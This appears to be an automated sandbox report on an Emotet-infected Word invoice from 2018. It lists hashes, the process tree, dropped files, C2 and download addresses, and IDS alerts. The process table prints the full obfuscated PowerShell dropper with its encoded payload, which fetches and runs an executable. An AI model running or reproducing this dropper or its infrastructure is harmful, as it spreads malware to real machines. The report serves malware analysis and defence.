File name: | INVOICE_V0_8-40_J999.doc |
Full analysis: | https://app.any.run/tasks/e73b64df-9e9a-4127-9d28-d36a2b9ef715 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 08, 2018, 11:46:23 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Harper-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 8 03:58:00 2018, Last Saved Time/Date: Thu Nov 8 03:58:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | 9C59885CD36A7EF88A5842DA834455EA |
SHA1: | 7375F8AA5A7B88AA0D3AAA2782382BC9A53253B1 |
SHA256: | EC3B2B6FEBB35F8A51D08A718412C93D8978C24E9C791817370DAC7F0884E27E |
SSDEEP: | 768:L9EVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o92FceZCrrjIS:L9Eocn1kp59gxBK85fBt+a9Zj |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 14 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 13 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:11:08 03:58:00 |
CreateDate: | 2018:11:08 03:58:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Harper-PC |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3740 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\INVOICE_V0_8-40_J999.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
540 | CMD C:\wIndowS\sySTem32\CMD.ExE /C "SeT FYB=^& ((Gv '*mDr*').nAme[3,11,2]-joIN'') ( NeW-oBJecT io.StrEAMReAder((NeW-oBJecT SysTEm.iO.CoMprESSiOn.DEfLAtestrEAM( [sySTeM.IO.mEMORysTrEAm] [SysTEm.conveRt]::FrOMBASE64STrinG( 'TZBda8IwGIX/Si8CUZwpc4OhoSDq5vxAhLk5YTdJ+jbNTBPXxsYi/vdV3cDb8xweDgf9iE1kwLct/wbhggU4sgY+1AqMo2j2MY5w6tyuF4bcHmwilZQaCiJsFq6Kp+1g3d3I/l9DsJxbwysHFy4XJSzL4b644aqQ7Aq9y6v1/B9574l03uY6ZoLFkFXEA08Vv6qmw/dDOug839ZZZS2HeC+YU9Yw7fJ94YgyYf44SzYuuZ9+YvK208o1cB83KcpWyyAKcOehgymyk3mEwJQ9B9muhb9w68xbmMABME1sDkykDTR+HQXKBOcjmsd68RHVh5GR9UZbFr8oDZfOXXAWNunElHYL7UktvSSU154tPdUbRXo8nX4B') , [IO.comPResSiOn.COmpRessionmOde]::dECOmpReSs ) ) ,[SYsTEm.tEXT.ENCoDiNG]::AScII)).reAdTOeNd() && POweRsheLL sEt-ITEM ( 'va' + 'Riab'+'l' + 'e:l9eS' + '2' ) ( [TYPe](\"{1}{2}{0}\" -F'ronMent','EN','vI' ) ) ; ( (Gci ( 'Va' + 'RiAb'+'l' + 'e:L9ES' + '2') ).VALUE::(\"{2}{0}{1}{4}{3}\" -f 'ETENV','IRoNmENtV','G','ABLE','ARI' ).Invoke('fYB',(\"{0}{2}{1}\"-f 'pRo','s','cEs' ) )) ^| . ( ( ^& ('Gv') ( \"{0}{1}\"-f '*MD','r*' )).\"N`AMe\"[3,11,2]-jOiN'' )" | C:\Windows\system32\CMD.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3160 | POweRsheLL sEt-ITEM ( 'va' + 'Riab'+'l' + 'e:l9eS' + '2' ) ( [TYPe](\"{1}{2}{0}\" -F'ronMent','EN','vI' ) ) ; ( (Gci ( 'Va' + 'RiAb'+'l' + 'e:L9ES' + '2') ).VALUE::(\"{2}{0}{1}{4}{3}\" -f 'ETENV','IRoNmENtV','G','ABLE','ARI' ).Invoke('fYB',(\"{0}{2}{1}\"-f 'pRo','s','cEs' ) )) | . ( ( & ('Gv') ( \"{0}{1}\"-f '*MD','r*' )).\"N`AMe\"[3,11,2]-jOiN'' ) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CMD.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3072 | "C:\Users\admin\AppData\Local\Temp\232.exe" | C:\Users\admin\AppData\Local\Temp\232.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Norwegian with Sami Keyboard Layout Exit code: 0 Version: 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) | ||||
3908 | "C:\Users\admin\AppData\Local\Temp\232.exe" | C:\Users\admin\AppData\Local\Temp\232.exe | 232.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Norwegian with Sami Keyboard Layout Exit code: 0 Version: 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) | ||||
3504 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | 232.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Norwegian with Sami Keyboard Layout Exit code: 0 Version: 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) | ||||
4020 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | lpiograd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Norwegian with Sami Keyboard Layout Version: 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3740 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3052.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3160 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4POGMXQDLE7XCNBWWKVD.temp | — | |
MD5:— | SHA256:— | |||
3740 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:1178BF800A7E9A315A240C34A220AC74 | SHA256:D9C88E977D14F6A961A1118B14A375E85A2D6FC2467D14A13161D3D2EBF0E8B7 | |||
3160 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF183880.TMP | binary | |
MD5:2E6C332796340AFFBFF5230455889D0D | SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E | |||
3160 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2E6C332796340AFFBFF5230455889D0D | SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E | |||
3908 | 232.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:6823E6E9A4321CFDA0767502921358E3 | SHA256:63B0ECC943FCE32C509E12AF374918B7D0C9C65663F5B2E100FACC2FAEE1DC81 | |||
3740 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$VOICE_V0_8-40_J999.doc | pgc | |
MD5:7313191687B7956116C276C62C2466AD | SHA256:F4FA780DC0A4F6774FB0DF110CFFC55EF3A81D8507ED0C87827CFFD6AEACEE04 | |||
3160 | powershell.exe | C:\Users\admin\AppData\Local\Temp\232.exe | executable | |
MD5:6823E6E9A4321CFDA0767502921358E3 | SHA256:63B0ECC943FCE32C509E12AF374918B7D0C9C65663F5B2E100FACC2FAEE1DC81 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4020 | lpiograd.exe | GET | — | 207.255.59.231:443 | http://207.255.59.231:443/ | US | — | — | malicious |
4020 | lpiograd.exe | GET | — | 187.163.174.149:8080 | http://187.163.174.149:8080/ | MX | — | — | malicious |
4020 | lpiograd.exe | GET | — | 70.60.50.60:8080 | http://70.60.50.60:8080/ | US | — | — | malicious |
4020 | lpiograd.exe | GET | — | 216.176.21.143:80 | http://216.176.21.143/ | US | — | — | malicious |
4020 | lpiograd.exe | GET | — | 118.69.186.155:8080 | http://118.69.186.155:8080/ | VN | — | — | malicious |
3160 | powershell.exe | GET | 200 | 50.62.102.1:80 | http://boxofgiggles.com/Ts7kBW9Yg/ | US | executable | 792 Kb | malicious |
4020 | lpiograd.exe | GET | — | 47.157.181.81:443 | http://47.157.181.81:443/ | US | — | — | malicious |
4020 | lpiograd.exe | GET | — | 24.216.53.12:80 | http://24.216.53.12/ | US | — | — | malicious |
4020 | lpiograd.exe | GET | — | 50.121.220.115:80 | http://50.121.220.115/ | US | — | — | malicious |
3160 | powershell.exe | GET | 301 | 50.62.102.1:80 | http://boxofgiggles.com/Ts7kBW9Yg | US | html | 308 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4020 | lpiograd.exe | 70.60.50.60:8080 | — | Time Warner Cable Internet LLC | US | malicious |
4020 | lpiograd.exe | 187.163.174.149:8080 | — | Axtel, S.A.B. de C.V. | MX | malicious |
3160 | powershell.exe | 50.62.102.1:80 | boxofgiggles.com | GoDaddy.com, LLC | US | malicious |
4020 | lpiograd.exe | 50.21.147.8:8090 | — | Otelco Telephone, LLC | US | malicious |
4020 | lpiograd.exe | 216.176.21.143:80 | — | Great Lakes Comnet, Inc. | US | malicious |
4020 | lpiograd.exe | 207.255.59.231:443 | — | Atlantic Broadband Finance, LLC | US | malicious |
4020 | lpiograd.exe | 118.69.186.155:8080 | — | The Corporation for Financing & Promoting Technology | VN | malicious |
4020 | lpiograd.exe | 5.32.65.50:8080 | — | Emirates Integrated Telecommunications Company PJSC (EITC-DU) | AE | malicious |
4020 | lpiograd.exe | 47.157.181.81:443 | — | Frontier Communications of America, Inc. | US | malicious |
4020 | lpiograd.exe | 212.227.15.162:25 | pop.1und1.de | 1&1 Internet SE | DE | unknown |
Domain | IP | Reputation |
---|---|---|
boxofgiggles.com |
| malicious |
mail.biz.rr.com |
| shared |
de15.mihosting.net |
| unknown |
mail.moebelhandel-muensterland.de |
| unknown |
mail.supercines.com.ve |
| unknown |
smtp.funcacorr.org.ar |
| unknown |
pop.mail.yahoo.com |
| shared |
mail.gaesa.com.ar |
| unknown |
pop3.personal-black.com.ar |
| unknown |
smtp.bibbtool.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
3160 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader |
3160 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3160 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3160 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
4020 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
4020 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
4020 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
4020 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
4020 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
4020 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |